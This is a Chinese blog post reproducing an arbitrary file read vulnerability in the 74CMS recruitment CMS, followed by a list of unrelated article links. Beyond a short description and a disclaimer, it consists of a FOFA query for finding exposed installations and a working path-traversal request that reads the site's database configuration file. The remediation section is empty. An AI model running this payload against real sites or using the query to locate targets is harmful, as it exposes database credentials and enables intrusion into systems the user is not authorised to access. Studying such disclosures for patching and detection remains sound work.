当前位置: 首页 > news >正文

【漏洞复现】74cms任意文件读取

news 来源:原创 2024/5/14 5:48:51

漏洞描述

74CMS 是一款国内用的比较多招聘网站管理系统(Job Board CMS),专注于招聘和人力资源领域的网站建设,存在任意文件读取漏洞

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa  body="74cmsse"

漏洞复现

/index/download/index?name=index.php&url=../../application/database.php
在这里插入图片描述

修复方案

相关文章:

  • HCIE-kubernetes(k8s)-Authentication身份验证
  • SpringCloud 微服务全栈体系(十)
  • leetcode_208 实现Trie(前缀树)
  • zookeeper节点类型
  • 听GPT 讲Rust源代码--library/std(13)
  • 集线器、交换机、网桥、路由器、网关
  • 如何使用Python和Matplotlib创建双Y轴动态风格折线图 | 数据可视化教程
  • C++进阶语法——STL 标准模板库(下)(Standard Template Library)【学习笔记(七)】
  • 【SpringCloud Alibaba -- Nacos】Linux 搭建 Nacos 集群
  • Vue3后台管理系统框架之时间格式化封装
  • Spring整合JUnit
  • 服务器搭建:从零开始创建自己的Spring Boot应用【含登录、注册功能】
  • 【wp】2023鹏城杯初赛 Web web1(反序列化漏洞)
  • onnx 模型加载部署运行方式
  • 词典查询工具django-mdict
  • .pyc 想到的一些问题
  • [原]深入对比数据科学工具箱:Python和R 非结构化数据的结构化
  • 「前端早读君006」移动开发必备:那些玩转H5的小技巧
  • 【Linux系统编程】快速查找errno错误码信息
  • 【翻译】babel对TC39装饰器草案的实现
  • 2018以太坊智能合约编程语言solidity的最佳IDEs
  • create-react-app项目添加less配置
  • DataBase in Android
  • go语言学习初探(一)
  • Java|序列化异常StreamCorruptedException的解决方法
  • JS笔记四:作用域、变量(函数)提升
  • mysql外键的使用
  • Odoo domain写法及运用
  • Spring框架之我见(三)——IOC、AOP
  • SSH 免密登录
  • Vue ES6 Jade Scss Webpack Gulp
  • 回流、重绘及其优化
  • 基于web的全景—— Pannellum小试
  • 开发了一款写作软件(OSX,Windows),附带Electron开发指南
  • 浅谈Golang中select的用法
  • 人脸识别最新开发经验demo
  • 实战:基于Spring Boot快速开发RESTful风格API接口
  • 数组的操作
  • 小程序开发中的那些坑
  • 协程
  • 学习HTTP相关知识笔记
  • 最简单的无缝轮播
  • scrapy中间件源码分析及常用中间件大全
  • 移动端高清、多屏适配方案
  • ​学习一下,什么是预包装食品?​
  • #LLM入门|Prompt#1.8_聊天机器人_Chatbot
  • #vue3 实现前端下载excel文件模板功能
  • (Demo分享)利用原生JavaScript-随机数-实现做一个烟花案例
  • (附源码)小程序儿童艺术培训机构教育管理小程序 毕业设计 201740
  • (介绍与使用)物联网NodeMCUESP8266(ESP-12F)连接新版onenet mqtt协议实现上传数据(温湿度)和下发指令(控制LED灯)
  • (三维重建学习)已有位姿放入colmap和3D Gaussian Splatting训练
  • (一)SpringBoot3---尚硅谷总结
  • (转)3D模板阴影原理
  • (转)AS3正则:元子符,元序列,标志,数量表达符
  • (最全解法)输入一个整数,输出该数二进制表示中1的个数。